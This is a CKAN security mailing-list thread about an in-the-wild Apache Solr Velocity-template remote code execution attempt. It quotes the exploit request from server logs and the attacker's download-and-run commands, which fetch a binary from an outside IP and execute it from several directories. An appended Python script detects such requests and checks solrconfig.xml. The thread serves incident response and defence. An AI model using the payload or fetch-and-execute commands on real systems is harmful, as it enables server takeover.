[CKAN-Security] Vulnerability in the Wild

Tyler Kennedy tk at tkte.ch
Wed Nov 6 19:00:15 UTC 2019


This is what it tries to run (duplicate lines are not a mistake, this is a
script kiddie trying to piece something together so it is messy):

```
/usr/bin/curl -o /root/rter http://194.249.0.167/sites/default/files/sync
chmod +x /root/rter
chmod 777 /root/rter
/root/rter
/root/rter 2>&1
/usr/bin/curl -o /tmp/erta http://194.249.0.167/sites/default/files/sync
chmod +x /tmp/erta
chmod 777 /tmp/erta
/tmp/erta
/tmp/erta
/usr/bin/wget  -O /home/so*/fert
http://194.249.0.167/sites/default/files/sync
chmod 777 /home/so*/fert
/home/so*/fert
/home/so*/fert
/usr/bin/curl -o /var/tmp/etfet
http://194.249.0.167/sites/default/files/sync
chmod 777 /var/tmp/etfet
/var/tmp/etfet
/usr/bin/wgetak -O /var/tmp/rtsfv
http://194.249.0.167/sites/default/files/sync
chmod 777 /var/tmp/rtsfv
/var/tmp/rtsfv
/var/tmp/rtsfv
/usr/bin/curl -o /dev/shm/reuer
http://194.249.0.167/sites/default/files/sync
chmod 777 /dev/shm/reuer
/dev/shm/reuer
/usr/bin/wget -O /dev/shm/reuer
http://194.249.0.167/sites/default/files/sync
chmod 777 /dev/shm/reuer
```

On Wed, Nov 6, 2019 at 1:51 PM Tyler Kennedy <tk at tkte.ch> wrote:

> Hello.
>
> This is not a CKAN exploit, but an exploit in Solr allowing remote code
> execution. It is copied from
> https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template.
> Are you sure this actually affected you? You will see garbage in the logs
> that did nothing all the time as bots try to find exploits. Make sure
> VelocityResponseWriter is disabled (should be by default) and this exploit
> will do nothing.
>
> Thank you,
> Tyler Kennedy
>
> On Wed, Nov 6, 2019 at 12:49 PM Fabian Fink <fink at h0st.space> wrote:
>
>> Ckan 2.8.x
>> Solr 6.6.x
>> Solr Logs:
>>  webapp=/solr path=/select
>> params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('/bin/bash+-c+{echo,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%3D%3D}|{base64,-d}|{bash,-i}'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity}
>> hits=0 status=0 QTime=0
>>
>> any version unaffected?
>> how could we fix it?
>>
>> --
>> You received this message because you are subscribed to the Google Groups
>> "CKAN Security" group.
>> To unsubscribe from this group and stop receiving emails from it, send an
>> email to security+unsubscribe at ckan.org.
>> _______________________________________________
>> CKAN security
>> https://lists.okfn.org/mailman/listinfo/security
>> https://lists.okfn.org/mailman/options/security/tk%40tkte.ch
>>
>> Repo: https://github.com/ckan/ckan-security
>
>
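As a defender-side addition to this thread (example code written for this page, not part of the original messages and not code from CKAN, Solr or the linked repository), the block below does two things the replies above ask for: it scans Solr request-log lines in the format quoted by Fabian (`path=/select params={...} hits= status= QTime=`) for the Velocity-template indicators (`wt=velocity`, a template supplied in `v.template.custom`, and reflection/`Runtime.exec` markers inside parameter values), and it checks a `solrconfig.xml` for a registered `solr.VelocityResponseWriter` and its `params.resource.loader.enabled` init parameter, which is what lets a request carry its own template. The sample log lines and the `solrconfig.xml` fragment are constructed for illustration (the command in the sample payload is a placeholder); the code assumes Python 3.9+ and only the standard library.

```python
"""Detect Solr Velocity-template RCE attempts in request logs and check
solrconfig.xml for the VelocityResponseWriter.

Added example; not code from the CKAN security list, CKAN or Solr. The log
format follows the entry quoted in the thread. Sample log lines and the
sample solrconfig.xml below are constructed for illustration.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# Solr's request log prints the query parameters as params={k=v&k=v ...}.
PARAMS_RE = re.compile(r"params=\{(.*)\}\s+hits=")

# Substrings that only make sense inside a template that launches a process:
# reflection to reach java.lang.Runtime, then exec() and waiting on it.
EXEC_MARKERS = ("class.forName", "getRuntime", ".exec(", "waitFor")

# Constructed sample lines: a normal JSON query, a request modelled on the
# payload in the thread (command replaced by a placeholder), and a legitimate
# use of a server-side Velocity template without a client-supplied one.
SAMPLE_LOGS = [
    "webapp=/solr path=/select params={q=*:*&wt=json&rows=10} hits=42 status=0 QTime=3",
    "webapp=/solr path=/select params={q=1&v.template=custom&v.template.custom="
    "#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))"
    "+#set($ex%3D$rt.getRuntime().exec('COMMAND_PLACEHOLDER'))+$ex.waitFor()"
    "&wt=velocity} hits=0 status=0 QTime=0",
    "webapp=/solr path=/select params={q=cheese&wt=velocity&v.template=browse} hits=3 status=0 QTime=1",
]

# Constructed solrconfig.xml fragment; the element and parameter names are
# Solr's own, the values are chosen to show the risky configuration.
SAMPLE_SOLRCONFIG = """<config>
  <queryResponseWriter name="velocity" class="solr.VelocityResponseWriter" startup="lazy">
    <bool name="params.resource.loader.enabled">true</bool>
  </queryResponseWriter>
</config>
"""


def parse_solr_params(line: str) -> dict:
    """Return the decoded query parameters of one Solr request-log line."""
    m = PARAMS_RE.search(line)
    if not m:
        return {}
    # parse_qs percent-decodes (%3D -> '=') and maps '+' to a space, which is
    # how Solr itself saw the values, so the markers below match the decoded form.
    return {k: v[0] for k, v in parse_qs(m.group(1), keep_blank_values=True).items()}


def classify(line: str) -> tuple[str, list[str]]:
    """Classify one log line as ok / warn / critical and list the indicators hit."""
    params = parse_solr_params(line)
    hits = []
    if params.get("wt", "").lower() == "velocity":
        hits.append("velocity_writer")              # the writer is reachable at all
    if "v.template.custom" in params:
        hits.append("custom_template_in_request")   # template text supplied by the client
    blob = " ".join(params.values())
    for marker in EXEC_MARKERS:
        if marker in blob:
            hits.append(f"runtime_exec:{marker}")
    if any(h.startswith(("custom_template", "runtime_exec")) for h in hits):
        return "critical", hits
    if hits:
        return "warn", hits                          # worth a look, not proof of compromise
    return "ok", hits


def scan(lines) -> list[tuple[int, str, list[str]]]:
    """Run classify() over many lines; returns (line_no, level, hits) for non-ok lines."""
    findings = []
    for no, line in enumerate(lines, start=1):
        level, hits = classify(line)
        if level != "ok":
            findings.append((no, level, hits))
    return findings


def check_velocity_writer(solrconfig_xml: str) -> dict:
    """Report whether solrconfig.xml registers solr.VelocityResponseWriter and
    whether params.resource.loader.enabled lets requests carry their own template."""
    root = ET.fromstring(solrconfig_xml)
    report = {"writer_registered": False, "params_loader_enabled": False}
    for writer in root.iter("queryResponseWriter"):
        if writer.get("class") != "solr.VelocityResponseWriter":
            continue
        report["writer_registered"] = True
        for flag in writer.findall("bool"):
            if flag.get("name") == "params.resource.loader.enabled":
                report["params_loader_enabled"] = (flag.text or "").strip().lower() == "true"
    return report


if __name__ == "__main__":
    for no, level, hits in scan(SAMPLE_LOGS):
        print(f"line {no}: {level} {hits}")
    print("solrconfig:", check_velocity_writer(SAMPLE_SOLRCONFIG))
```

The config check reads the on-disk file only; Solr's Config API can change writer settings on a running core, so the running configuration should be checked the same way, and the advice in the thread still stands: if the Velocity writer is not needed, remove it from `solrconfig.xml` rather than relying on `params.resource.loader.enabled` being false. For the log scan, `warn` hits on `wt=velocity` alone are expected on an instance that legitimately serves Velocity templates; the `critical` combination (client-supplied template plus reflection or `exec` markers) is the one to alert on.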